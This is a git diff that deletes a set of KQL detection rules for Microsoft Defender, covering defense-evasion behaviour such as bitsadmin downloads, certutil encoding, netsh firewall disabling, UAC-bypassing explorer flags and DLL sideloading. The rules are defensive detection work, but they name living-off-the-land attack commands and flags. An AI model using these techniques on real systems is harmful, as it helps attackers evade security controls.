diff --git a/Defense Evasion/Execution_Of_Non-Existing_File.kql b/Defense Evasion/Execution_Of_Non-Existing_File.kql
deleted file mode 100644
index 21d8dc22..00000000
--- a/Defense Evasion/Execution_Of_Non-Existing_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2021/12/09
-// Level: high
-// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_from_Suspicious_Folder.kql b/Defense Evasion/Execution_from_Suspicious_Folder.kql
deleted file mode 100644
index 41e17b99..00000000
--- a/Defense Evasion/Execution_from_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Tim Shelton
-// Date: 2019/01/16
-// Level: high
-// Description: Detects a suspicious execution from an uncommon folder
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ((FolderPath contains "\\$Recycle.bin\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\NetworkService\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\debug\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\Help\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\Media\\" or FolderPath contains "\\Windows\\repair\\" or FolderPath contains "\\Windows\\security\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\") or FolderPath startswith "C:\\Perflogs\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql b/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql
deleted file mode 100644
index 518a4a2d..00000000
--- a/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
-This rule might require some initial baselining to align with some third party tooling in the user environment.
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\"))))
\ No
newline at end of file
diff --git a/Defense Evasion/Execution_via_WorkFolders.exe.kql b/Defense Evasion/Execution_via_WorkFolders.exe.kql
deleted file mode 100644
index aa865be5..00000000
--- a/Defense Evasion/Execution_via_WorkFolders.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut)
-// Date: 2021/10/21
-// Level: high
-// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_via_stordiag.exe.kql b/Defense Evasion/Execution_via_stordiag.exe.kql
deleted file mode 100644
index 7bc49c98..00000000
--- a/Defense Evasion/Execution_via_stordiag.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger)
-// Date: 2021/10/21
-// Level: high
-// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Explorer_NOUACCHECK_Flag.kql b/Defense Evasion/Explorer_NOUACCHECK_Flag.kql
deleted file mode 100644
index f23f2ead..00000000
--- a/Defense Evasion/Explorer_NOUACCHECK_Flag.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/23
-// Level: high
-// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
-// Tags: attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Explorer_Process_Tree_Break.kql b/Defense Evasion/Explorer_Process_Tree_Break.kql
deleted file mode 100644
index 0193292f..00000000
--- a/Defense Evasion/Explorer_Process_Tree_Break.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
-// Date: 2019/06/29
-// Level: medium
-// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
-which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and ProcessCommandLine contains " /root,")
\ No newline at end of file
diff --git a/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql b/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql
deleted file mode 100644
index 30f379f3..00000000
--- a/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/04
-// Level: high
-// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql b/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql
deleted file mode 100644
index e6a60f52..00000000
--- a/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Deletion_Via_Del.kql b/Defense Evasion/File_Deletion_Via_Del.kql
deleted file mode 100644
index e572cd87..00000000
--- a/Defense Evasion/File_Deletion_Via_Del.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2022/01/15
-// Level: low
-// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files.
-Adversaries may delete files left behind by the actions of their intrusion activity.
-Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql b/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql
deleted file mode 100644
index 7413072b..00000000
--- a/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: medium
-// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin.kql b/Defense Evasion/File_Download_Via_Bitsadmin.kql
deleted file mode 100644
index e877ea4a..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, FPT.EagleEye
-// Date: 2017/03/09
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql b/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
deleted file mode 100644
index c7fb9c33..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql b/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
deleted file mode 100644
index 7c74c2ea..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql b/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql
deleted file mode 100644
index 90991c2d..00000000
--- a/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql b/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql
deleted file mode 100644
index c687fb97..00000000
--- a/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Matchen
-// Date: 2020/09/04
-// Level: high
-// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
-// Tags: attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility")
\ No newline at end of file
diff --git a/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index 2eefdfc1..00000000
--- a/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/02/24
-// Level: medium
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index f034c2e4..00000000
--- a/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: high
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql b/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
deleted file mode 100644
index 03b37b13..00000000
--- a/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql b/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql
deleted file mode 100644
index 252e71d1..00000000
--- a/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/26
-// Level: medium
-// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).
-It is highly recommended to perform an initial baseline before using this rule in production.
-
-// Tags: attack.defense_evasion, attack.t1036.005
-DeviceFileEvents
-| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith
"\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "\\SystemRoot\\System32\\" or FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and 
FolderPath endswith "\\SecurityHealthSystray.exe") or (InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" and (FolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" and FolderPath contains "C:\\Program Files\\WindowsApps\\") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql b/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql
deleted file mode 100644
index 3c11c9c1..00000000
--- a/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali
-// Date: 2023/02/13
-// Level: high
-// Description: Detect filter driver unloading activity via fltmc.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.t1562, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not(ProcessCommandLine endswith "unload rtp_filesystem_filter"))
\ No newline at end of file
diff --git a/Defense Evasion/Findstr_Launching_.lnk_File.kql b/Defense Evasion/Findstr_Launching_.lnk_File.kql
deleted file mode 100644
index 64018244..00000000
--- a/Defense Evasion/Findstr_Launching_.lnk_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick
-// Date: 2020/05/01
-// Level: medium
-// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
-// Tags: attack.defense_evasion, attack.t1036, attack.t1202, attack.t1027.003
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql b/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql
deleted file mode 100644
index cd3e65d2..00000000
--- a/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Fatih Sirin
-// Date: 2019/11/01
-// Level: medium
-// Description: Detects netsh commands that turns off the Windows firewall
-// Tags: attack.defense_evasion, attack.t1562.004, attack.s0108
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off"))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql b/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql
deleted file mode 100644
index 327f798c..00000000
--- a/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/14
-// Level: medium
-// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not((ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql b/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql
deleted file mode 100644
index d08734e3..00000000
--- a/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/18
-// Level: medium
-// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql b/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql
deleted file mode 100644
index a504127b..00000000
--- a/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
